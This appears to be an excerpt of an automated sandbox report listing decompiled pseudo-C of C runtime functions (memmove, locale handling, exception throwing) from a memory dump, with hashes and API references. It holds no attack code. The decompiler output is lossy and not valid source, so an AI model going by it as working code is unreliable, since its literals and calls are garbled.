                                            0x00302ced
                                            0x00302cf3
                                            0x00302cf8
                                            0x00302cfb
                                            0x00302cfd
                                            0x00302d69
                                            0x00302d6f
                                            0x00302cff
                                            0x00302cff
                                            0x00302cff
                                            0x00302d03
                                            0x00302d05
                                            0x00302d05
                                            0x00302d07
                                            0x00302d0b
                                            0x00302d37
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d39
                                            0x00302d3b
                                            0x00302d43
                                            0x00302d48
                                            0x00302d4b
                                            0x00302d4f
                                            0x00302d52
                                            0x00302d65
                                            0x00000000
                                            0x00302d54
                                            0x00302d56
                                            0x00302d60
                                            0x00302d60
                                            0x00302d52
                                            0x00302cfd
                                            0x00302ceb
                                            0x00302c96
                                            0x00302c96
                                            0x00302c99
                                            0x00302c9c
                                            0x00302d7c
                                            0x00302d81
                                            0x00302d86
                                            0x00302d86
                                            0x00302d8b
                                            0x00302d90
                                            0x00302d91
                                            0x00302d92
                                            0x00302d93
                                            0x00302d94
                                            0x00302d95
                                            0x00302d96
                                            0x00302d97
                                            0x00302d98
                                            0x00302d99
                                            0x00302d9a
                                            0x00302d9b
                                            0x00302d9c
                                            0x00302d9d
                                            0x00302d9e
                                            0x00302d9f
                                            0x00302da0
                                            0x00302da3
                                            0x00302da7
                                            0x00302da8
                                            0x00302da9
                                            0x00302dac
                                            0x00302dae
                                            0x00302db0
                                            0x00302db4
                                            0x00302db6
                                            0x00302db7
                                            0x00302db9
                                            0x00302dbb
                                            0x00302dc0
                                            0x00302dc5
                                            0x00302dc5
                                            0x00302dc9
                                            0x00302dd1
                                            0x00302db4
                                            0x00302dd2
                                            0x00302dd5
                                            0x00302ddc
                                            0x00302de3
                                            0x00302ca2
                                            0x00302ca2
                                            0x00302ca6
                                            0x00302ca9
                                            0x00302cc6
                                            0x00302ccb
                                            0x00302ccf
                                            0x00302cda
                                            0x00302cab
                                            0x00302cad
                                            0x00302cb2
                                            0x00302cb6
                                            0x00302cc1
                                            0x00302cc1
                                            0x00302ca9
                                            0x00302c9c
                                            0x00302c94
                                            0x00302bcd
                                            0x00302bcd
                                            0x00302bd0
                                            0x00302bd2
                                            0x00302bee
                                            0x00302bf0
                                            0x00000000
                                            0x00302bf2
                                            0x00302bf2
                                            0x00302bf5
                                            0x00302bf8
                                            0x00302c08
                                            0x00302c0d
                                            0x00302c11
                                            0x00302bfa
                                            0x00302bfd
                                            0x00302c05
                                            0x00302c05
                                            0x00302bf8
                                            0x00302bd4
                                            0x00302bd8
                                            0x00302bdd
                                            0x00302be0
                                            0x00302be2
                                            0x00302c48
                                            0x00000000
                                            0x00302be4
                                            0x00302be4
                                            0x00302be4
                                            0x00302be8
                                            0x00302c14
                                            0x00302bea
                                            0x00302bea
                                            0x00302bea
                                            0x00302c16
                                            0x00302c18
                                            0x00302c1e
                                            0x00302c22
                                            0x00302c27
                                            0x00302c2a
                                            0x00302c2e
                                            0x00302c31
                                            0x00302c44
                                            0x00000000
                                            0x00302c33
                                            0x00302c35
                                            0x00302c3f
                                            0x00302c3f
                                            0x00302c31
                                            0x00302be2
                                            0x00302bd2
                                            0x00302bc7
                                            0x00302bba
                                            0x00302b4e
                                            0x00302b4e
                                            0x00302b51
                                            0x00302b54
                                            0x00302b5a
                                            0x00302b56
                                            0x00302b56
                                            0x00302b56
                                            0x00302b5c
                                            0x00302b5e
                                            0x00000000
                                            0x00302b60
                                            0x00302b60
                                            0x00302b63
                                            0x00302b69
                                            0x00302b65
                                            0x00302b65
                                            0x00302b65
                                            0x00302b6e
                                            0x00302b70
                                            0x00302b72
                                            0x00000000
                                            0x00302b74
                                            0x00302b74
                                            0x00302b77
                                            0x00302b8f
                                            0x00302b96
                                            0x00302ba2
                                            0x00302b79
                                            0x00302b79
                                            0x00302b80
                                            0x00302b8c
                                            0x00302b8c
                                            0x00302b77
                                            0x00302b72
                                            0x00302b5e
                                            0x00302a87
                                            0x00302a87
                                            0x00302a8c
                                            0x00302ab0
                                            0x00302ab2
                                            0x00000000
                                            0x00302ab4
                                            0x00302ab4
                                            0x00302ab7
                                            0x00302aba
                                            0x00302acf
                                            0x00302ad3
                                            0x00302abc
                                            0x00302abf
                                            0x00302ac7
                                            0x00302ac7
                                            0x00302aba
                                            0x00302a8e
                                            0x00302a92
                                            0x00302a97
                                            0x00302a9c
                                            0x00302b0f
                                            0x00000000
                                            0x00302a9e
                                            0x00302a9e
                                            0x00302aa2
                                            0x00302aa4
                                            0x00302aa4
                                            0x00302aaa
                                            0x00302ad6
                                            0x00302aac
                                            0x00302aac
                                            0x00302aac
                                            0x00302ada
                                            0x00302ae9
                                            0x00302aee
                                            0x00302af5
                                            0x00302af8
                                            0x00302b0b
                                            0x00000000
                                            0x00302afa
                                            0x00302afc
                                            0x00302b06
                                            0x00302b06
                                            0x00302af8
                                            0x00302a9c
                                            0x00302a8c
                                            0x00302a81
                                            0x00302a74
                                            0x00302a6c

                                            APIs
                                            • _memmove.LIBCMT ref: 00302AE9
                                            • _memmove.LIBCMT ref: 00302C22
                                              • Part of subcall function 00306290: _memmove.LIBCMT ref: 0030635E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 4104443479-4289949731
                                            • Opcode ID: 073afca4ba186a09f62932b084c4bdf889a0f8c9ed3d655a477e9b457df3385e
                                            • Instruction ID: 782995f7b63f3b00649e28c69ecefad06c65498c98f4a3cdd14cc876c37954d8
                                            • Opcode Fuzzy Hash: 073afca4ba186a09f62932b084c4bdf889a0f8c9ed3d655a477e9b457df3385e
                                            • Instruction Fuzzy Hash: D361DA323016108BD726DE5CECA4A6BF7A9EF91721B204A2EF551CB6D1C771DC4183A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00308F56, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00308F56(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t66;
				signed int _t74;
				signed int _t76;
				void* _t78;
				signed int _t80;
				signed int _t86;
				signed int _t89;
				intOrPtr _t92;
				signed int _t104;
				signed int* _t105;
				signed int* _t106;
				void* _t108;
				signed int _t110;
				void* _t111;
				void* _t112;

				_push(0x30);
				E0030F5B3(E003247B1, __ebx, __edi, __esi);
				_t108 = __ecx;
				_t86 =  *(_t111 + 8);
				_t110 = __esi | 0xffffffff;
				if(_t86 != _t110) {
					_t89 =  *( *(__ecx + 0x20));
					__eflags = _t89;
					if(_t89 == 0) {
						L6:
						__eflags =  *(_t108 + 0x50);
						if( *(_t108 + 0x50) == 0) {
							L34:
							L35:
							return E0030F571(_t86, _t108, _t110);
						}
						E00308DE4(_t108);
						__eflags =  *(_t108 + 0x40);
						if(__eflags != 0) {
							 *(_t111 - 0x34) = _t86;
							 *((intOrPtr*)(_t111 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t111 - 0x18)) = 0;
							 *(_t111 - 0x28) = 0;
							E003060B0(_t111 - 0x28, 8, 0);
							_t14 = _t111 - 4;
							 *_t14 =  *(_t111 - 4) & 0x00000000;
							__eflags =  *_t14;
							while(1) {
								L11:
								_t66 =  *(_t111 - 0x28);
								_t92 =  *((intOrPtr*)(_t111 - 0x14));
								 *(_t111 - 0x30) = _t66;
								while(1) {
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										_t66 = _t111 - 0x28;
									}
									 *(_t111 - 0x2c) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x30) = _t111 - 0x28;
									}
									_t74 =  *((intOrPtr*)( *( *(_t108 + 0x40)) + 0x1c))(_t108 + 0x48, _t111 - 0x34, _t111 - 0x33, _t111 - 0x3c,  *(_t111 - 0x30),  *((intOrPtr*)(_t111 - 0x18)) +  *(_t111 - 0x2c), _t111 - 0x38);
									_t86 =  *(_t111 + 8);
									__eflags = _t74;
									if(_t74 < 0) {
										break;
									}
									__eflags = _t74 - 1;
									if(_t74 > 1) {
										__eflags = _t74 - 3;
										if(__eflags != 0) {
											break;
										}
										_t76 = E00308867(__eflags,  *(_t111 - 0x34),  *(_t108 + 0x50));
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										L32:
										_t110 = _t86;
										break;
									}
									_t92 =  *((intOrPtr*)(_t111 - 0x14));
									_t66 =  *(_t111 - 0x28);
									 *(_t111 - 0x30) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x2c) = _t111 - 0x28;
									} else {
										 *(_t111 - 0x2c) = _t66;
									}
									_t104 =  *((intOrPtr*)(_t111 - 0x38)) -  *(_t111 - 0x2c);
									__eflags = _t104;
									 *(_t111 - 0x2c) = _t104;
									if(_t104 == 0) {
										L26:
										 *((char*)(_t108 + 0x45)) = 1;
										__eflags =  *((intOrPtr*)(_t111 - 0x3c)) - _t111 - 0x34;
										_t86 =  *(_t111 + 8);
										if( *((intOrPtr*)(_t111 - 0x3c)) != _t111 - 0x34) {
											goto L32;
										}
										__eflags = _t104;
										if(_t104 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t111 - 0x18)) - 0x20;
										if( *((intOrPtr*)(_t111 - 0x18)) >= 0x20) {
											break;
										}
										E00305FC0(_t66, _t111 - 0x28, 8, _t104);
										goto L11;
									} else {
										__eflags = _t92 - 0x10;
										if(__eflags < 0) {
											_t66 = _t111 - 0x28;
										}
										_push( *(_t108 + 0x50));
										_push(_t104);
										_push(1);
										_push(_t66);
										_t78 = E00310659(_t86, _t104, _t108, _t110, __eflags);
										_t104 =  *(_t111 - 0x2c);
										_t112 = _t112 + 0x10;
										__eflags = _t104 - _t78;
										if(_t104 != _t78) {
											break;
										} else {
											_t66 =  *(_t111 - 0x28);
											_t92 =  *((intOrPtr*)(_t111 - 0x14));
											 *(_t111 - 0x30) = _t66;
											goto L26;
										}
									}
								}
								E00302DA0(_t111 - 0x28, 1, 0);
								goto L34;
							}
						}
						_t80 = E00308867(__eflags, _t86,  *(_t108 + 0x50));
						__eflags = _t80;
						if(_t80 == 0) {
							_t86 = _t110;
						}
						L5:
						goto L35;
					}
					_t105 =  *(__ecx + 0x30);
					__eflags = _t89 -  *_t105 + _t89;
					if(_t89 >=  *_t105 + _t89) {
						goto L6;
					}
					 *_t105 =  *_t105 - 1;
					__eflags =  *_t105;
					_t106 =  *(__ecx + 0x20);
					_t110 =  *_t106;
					 *_t106 = _t110 + 1;
					 *_t110 = _t86;
					goto L5;
				}
				goto L35;
			}


















                                            0x00308f56
                                            0x00308f5d
                                            0x00308f62
                                            0x00308f64
                                            0x00308f67
                                            0x00308f6c
                                            0x00308f78
                                            0x00308f7a
                                            0x00308f7c
                                            0x00308f9e
                                            0x00308f9e
                                            0x00308fa2
                                            0x003090d9
                                            0x003090db
                                            0x003090e0
                                            0x003090e0
                                            0x00308faa
                                            0x00308fb1
                                            0x00308fb4
                                            0x00308fcf
                                            0x00308fd2
                                            0x00308fd9
                                            0x00308fdc
                                            0x00308fdf
                                            0x00308fe4
                                            0x00308fe4
                                            0x00308fe4
                                            0x00308fe8
                                            0x00308fe8
                                            0x00308fe8
                                            0x00308feb
                                            0x00308fee
                                            0x00308ff1
                                            0x00308ff1
                                            0x00308ff4
                                            0x00308ff6
                                            0x00308ff6
                                            0x00308ff9
                                            0x00308ffc
                                            0x00308fff
                                            0x00309004
                                            0x00309004
                                            0x0030902a
                                            0x0030902d
                                            0x00309030
                                            0x00309032
                                            0x00000000
                                            0x00000000
                                            0x00309038
                                            0x0030903b
                                            0x003090b5
                                            0x003090b8
                                            0x00000000
                                            0x00000000
                                            0x003090c0
                                            0x003090c7
                                            0x003090c9
                                            0x00000000
                                            0x00000000
                                            0x003090cb
                                            0x003090cb
                                            0x00000000
                                            0x003090cb
                                            0x0030903d
                                            0x00309040
                                            0x00309043
                                            0x00309046
                                            0x00309049
                                            0x00309053
                                            0x0030904b
                                            0x0030904b
                                            0x0030904b
                                            0x00309059
                                            0x00309059
                                            0x0030905c
                                            0x0030905f
                                            0x00309088
                                            0x0030908b
                                            0x0030908f
                                            0x00309092
                                            0x00309095
                                            0x00000000
                                            0x00000000
                                            0x00309097
                                            0x00309099
                                            0x00000000
                                            0x00000000
                                            0x0030909f
                                            0x003090a3
                                            0x00000000
                                            0x00000000
                                            0x003090ab
                                            0x00000000
                                            0x00309061
                                            0x00309061
                                            0x00309064
                                            0x00309066
                                            0x00309066
                                            0x00309069
                                            0x0030906c
                                            0x0030906d
                                            0x0030906f
                                            0x00309070
                                            0x00309075
                                            0x00309078
                                            0x0030907b
                                            0x0030907d
                                            0x00000000
                                            0x0030907f
                                            0x0030907f
                                            0x00309082
                                            0x00309085
                                            0x00000000
                                            0x00309085
                                            0x0030907d
                                            0x0030905f
                                            0x003090d4
                                            0x00000000
                                            0x003090d4
                                            0x00308fe8
                                            0x00308fba
                                            0x00308fc1
                                            0x00308fc3
                                            0x00308fc5
                                            0x00308fc5
                                            0x00308f97
                                            0x00000000
                                            0x00308f97
                                            0x00308f7e
                                            0x00308f85
                                            0x00308f87
                                            0x00000000
                                            0x00000000
                                            0x00308f89
                                            0x00308f89
                                            0x00308f8b
                                            0x00308f8e
                                            0x00308f93
                                            0x00308f95
                                            0x00000000
                                            0x00308f95
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog3_
                                            • String ID:
                                            • API String ID: 2427045233-3916222277
                                            • Opcode ID: d930362e3fc98a9c2c61bc5790d4c76dd874db303621b19fd49c925bce470a89
                                            • Instruction ID: c485cf0891f12c915c74876cf8b51887828646c53f6d28c496507d57271a09fd
                                            • Opcode Fuzzy Hash: d930362e3fc98a9c2c61bc5790d4c76dd874db303621b19fd49c925bce470a89
                                            • Instruction Fuzzy Hash: CB518471A0220AEFDF16DFA4D4A0AEEB7B5FF08314F14452AE551A76C1D731A944CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00308200, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00308200(intOrPtr __ecx, void* __eflags, void* _a4, signed char* _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v68;
				char _v112;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t38;
				signed int _t42;
				signed char* _t44;
				void* _t51;
				signed char** _t52;
				intOrPtr _t56;
				intOrPtr _t59;

				_push(0xffffffff);
				_push(E003246D0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				_push(_t51);
				_v20 = _t59 - 0x60;
				_t56 = __ecx;
				_v24 = __ecx;
				_t52 = E0030DDDD(_t51, __ecx, __eflags);
				E003083D4( &_v68);
				 *((intOrPtr*)(_t56 + 8)) = 0;
				 *((intOrPtr*)(_t56 + 0x10)) = 0;
				 *((intOrPtr*)(_t56 + 0x14)) = 0;
				_v8 = 0;
				_t44 = _a8;
				if(_t44 == 0) {
					_a8 = _t52[2];
				} else {
					_a8 = 0x32b855;
				}
				_push(E003012F0( &_v112));
				_push(0);
				 *((intOrPtr*)(_t56 + 8)) = E00308310(_a8);
				_push( &_v68);
				_push(0);
				 *((intOrPtr*)(_t56 + 0x10)) = E00308310("false");
				_push( &_v68);
				_push(0);
				_t38 = E00308310("true");
				 *((intOrPtr*)(_t56 + 0x14)) = _t38;
				_v8 = 0xffffffff;
				if(_t44 == 0) {
					 *((char*)(_t56 + 0xc)) =  *( *_t52) & 0x000000ff;
					_t42 =  *(_t52[1]) & 0x000000ff;
					 *(_t56 + 0xd) = _t42;
					 *[fs:0x0] = _v16;
					return _t42;
				} else {
					 *((short*)(_t56 + 0xc)) = 0x2c2e;
					 *[fs:0x0] = _v16;
					return _t38;
				}
			}



















                                            0x00308203
                                            0x00308205
                                            0x00308210
                                            0x00308211
                                            0x0030821d
                                            0x0030821e
                                            0x00308221
                                            0x00308223
                                            0x0030822b
                                            0x00308231
                                            0x00308239
                                            0x00308240
                                            0x00308247
                                            0x0030824e
                                            0x00308255
                                            0x0030825a
                                            0x00308268
                                            0x0030825c
                                            0x0030825c
                                            0x0030825c
                                            0x00308277
                                            0x00308278
                                            0x00308282
                                            0x00308288
                                            0x00308289
                                            0x00308295
                                            0x0030829b
                                            0x0030829c
                                            0x003082a3
                                            0x003082ab
                                            0x003082ae
                                            0x003082b7
                                            0x003082d7
                                            0x003082dd
                                            0x003082e0
                                            0x003082e6
                                            0x003082f3
                                            0x003082b9
                                            0x003082b9
                                            0x003082c2
                                            0x003082cf
                                            0x003082cf

                                            APIs
                                            • _localeconv.LIBCMT ref: 00308226
                                            • __Getcvt.LIBCPMT ref: 00308231
                                              • Part of subcall function 003083D4: ____lc_codepage_func.LIBCMT ref: 003083EB
                                              • Part of subcall function 003083D4: ____mb_cur_max_func.LIBCMT ref: 003083F4
                                              • Part of subcall function 003083D4: ____lc_locale_name_func.LIBCMT ref: 003083FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Getcvt____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
                                            • String ID: false$true
                                            • API String ID: 1835574032-2658103896
                                            • Opcode ID: 5785ff9cb6e48ee584b5fde8f4a0142b2390a8bb28e1370ad8df472be3b75cf4
                                            • Instruction ID: aaab94e6c317d5772c35f513e799e5f112747e2c0aa2ed7fbfb9d0f6a90fe3ba
                                            • Opcode Fuzzy Hash: 5785ff9cb6e48ee584b5fde8f4a0142b2390a8bb28e1370ad8df472be3b75cf4
                                            • Instruction Fuzzy Hash: B931D576905B48EFC721DF54D851B9AFBF8FB04B10F00865EE4A59B780D734A604CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0031F30A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0031F30A(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0031EDCD(_t28, ?str?) != 0) {
					if(E0031EDCD(_t28, ?str?) != 0) {
						return E00321BAF(_t28);
					}
					if(E00314248(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E00314248(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}





                                            0x0031f30e
                                            0x0031f313
                                            0x0031f33b
                                            0x00000000
                                            0x0031f369
                                            0x0031f35b
                                            0x0031f38c
                                            0x00000000
                                            0x0031f38c
                                            0x00000000
                                            0x0031f35d
                                            0x0031f38a
                                            0x00000000
                                            0x00000000
                                            0x0031f390
                                            0x0031f395
                                            0x0031f399
                                            0x0031f399
                                            0x0031f362

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcscmp
                                            • String ID: ACP$OCP
                                            • API String ID: 856254489-711371036
                                            • Opcode ID: 5a46c6fb011b83a1eb1e7259e710e20fb939b5423a3690215682678a072eb59d
                                            • Instruction ID: e7deda3458b6dede8f55742047e1bfca653fba066ad497b754ac8d8e2982937c
                                            • Opcode Fuzzy Hash: 5a46c6fb011b83a1eb1e7259e710e20fb939b5423a3690215682678a072eb59d
                                            • Instruction Fuzzy Hash: F801967A600A156EEB5B6A18EC42FDA739CAF087A5F054825F918DB181E770D7C082D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00316E45, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E00316E45(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				signed int _t20;
				signed int _t26;
				void* _t32;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t37 = __eflags;
				_t30 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x32d0c0);
				E00316090(__ebx, __edi, __esi);
				 *(_t36 - 0x1c) = 0;
				_t32 = E00315E81(__edx, __edi, _t37);
				_t26 =  *0x32eaf0; // 0xfffffffe
				if(( *(_t32 + 0x70) & _t26) == 0 ||  *((intOrPtr*)(_t32 + 0x6c)) == 0) {
					_t15 = E00310A40(0xd);
					 *((intOrPtr*)(_t36 - 4)) = 0;
					_t35 =  *(_t32 + 0x68);
					 *(_t36 - 0x1c) = _t35;
					__eflags = _t35 -  *0x32ef54; // 0x32ed30
					if(__eflags != 0) {
						__eflags = _t35;
						if(__eflags != 0) {
							__eflags = _t15 | 0xffffffff;
							asm("lock xadd [esi], eax");
							if(__eflags == 0) {
								__eflags = _t35 - 0x32ed30;
								if(__eflags != 0) {
									E0030DCB0(_t35);
								}
							}
						}
						_t20 =  *0x32ef54; // 0x32ed30
						 *(_t32 + 0x68) = _t20;
						_t35 =  *0x32ef54; // 0x32ed30
						 *(_t36 - 0x1c) = _t35;
						asm("lock xadd [esi], eax");
					}
					 *((intOrPtr*)(_t36 - 4)) = 0xfffffffe;
					E00316EE2();
				} else {
					_t35 =  *(_t32 + 0x68);
				}
				_t40 = _t35;
				if(_t35 == 0) {
					E0030E0FD(_t25, _t30, _t32, _t35, _t40, 0x20);
				}
				return E003160D5(_t35);
			}










                                            0x00316e45
                                            0x00316e45
                                            0x00316e45
                                            0x00316e45
                                            0x00316e47
                                            0x00316e4c
                                            0x00316e53
                                            0x00316e5b
                                            0x00316e5d
                                            0x00316e66
                                            0x00316e86
                                            0x00316e8c
                                            0x00316e8f
                                            0x00316e92
                                            0x00316e95
                                            0x00316e9b
                                            0x00316e9d
                                            0x00316e9f
                                            0x00316ea1
                                            0x00316ea4
                                            0x00316ea8
                                            0x00316eaa
                                            0x00316eb0
                                            0x00316eb3
                                            0x00316eb8
                                            0x00316eb0
                                            0x00316ea8
                                            0x00316eb9
                                            0x00316ebe
                                            0x00316ec1
                                            0x00316ec7
                                            0x00316ecd
                                            0x00316ecd
                                            0x00316ed1
                                            0x00316ed8
                                            0x00316e6d
                                            0x00316e6d
                                            0x00316e6d
                                            0x00316e70
                                            0x00316e72
                                            0x00316e76
                                            0x00316e7b
                                            0x00316e83

                                            APIs
                                              • Part of subcall function 00315E81: __getptd_noexit.LIBCMT ref: 00315E82
                                            • __lock.LIBCMT ref: 00316E86
                                            • _free.LIBCMT ref: 00316EB3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __getptd_noexit__lock_free
                                            • String ID: 02$02
                                            • API String ID: 1533244847-2221425373
                                            • Opcode ID: a56fd316042940c86f42c05425a3d72795d1eb7f840316d75971c6cab3beba29
                                            • Instruction ID: 01d3263d220c0688c219aa4ce89916fd549868a2e51e881adc87712b0b936500
                                            • Opcode Fuzzy Hash: a56fd316042940c86f42c05425a3d72795d1eb7f840316d75971c6cab3beba29
                                            • Instruction Fuzzy Hash: 97116539D016219BC72BEFA8DA03799B7A4AF0C720F16061DE865A7281CB745DC2CFD5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00317D77, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00317D77(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0x32d158);
				_t4 = E00316090(__ebx, __edi, __esi);
				_t17 =  *0x32ea34 - 0x32ea38; // 0x32ea38
				if(_t17 != 0) {
					E00310A40(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0x32ea34 = E00315D01("8�2", 0x32ea38);
					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E00317DC0();
				}
				return E003160D5(_t4);
			}






                                            0x00317d77
                                            0x00317d79
                                            0x00317d7e
                                            0x00317d88
                                            0x00317d8e
                                            0x00317d92
                                            0x00317d98
                                            0x00317da9
                                            0x00317dae
                                            0x00317db5
                                            0x00317db5
                                            0x00317dbf

                                            APIs
                                            • __lock.LIBCMT ref: 00317D92
                                              • Part of subcall function 00310A40: __mtinitlocknum.LIBCMT ref: 00310A52
                                              • Part of subcall function 00310A40: EnterCriticalSection.KERNEL32(00000000,?,00315F51,0000000D), ref: 00310A6B
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00317DA2
                                              • Part of subcall function 00315D01: ___addlocaleref.LIBCMT ref: 00315D1D
                                              • Part of subcall function 00315D01: ___removelocaleref.LIBCMT ref: 00315D28
                                              • Part of subcall function 00315D01: ___freetlocinfo.LIBCMT ref: 00315D3C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                            • String ID: 82$82
                                            • API String ID: 547918592-249292889
                                            • Opcode ID: 195b3bef4101d8b274e06c9097b66ff053e588da59d2d93032955a10e127a1ad
                                            • Instruction ID: 7852fbf69e75c0fb201349a46f6dc94741eccc4ddf9b8b6673936631f61c4249
                                            • Opcode Fuzzy Hash: 195b3bef4101d8b274e06c9097b66ff053e588da59d2d93032955a10e127a1ad
                                            • Instruction Fuzzy Hash: 1FE08C3248B320AAE62BB7E07C07BC82760BF48722F24024DF8485A1C1C9B415C08626
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0030996D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 00309980
                                              • Part of subcall function 0030D337: std::exception::_Copy_str.LIBCMT ref: 0030D350
                                            • __CxxThrowException@8.LIBCMT ref: 00309995
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                            • String ID: |a2$|a2P
                                            • API String ID: 757275642-537430067
                                            • Opcode ID: 5d2ec38503853c8d7e4c4509720edbe14d55b0d3834f5692cb546f78b379607a
                                            • Instruction ID: 8817b2c15b7298dda0ed962be8f2d003790c27f071c2b8cdb85fc0800c9adcf8
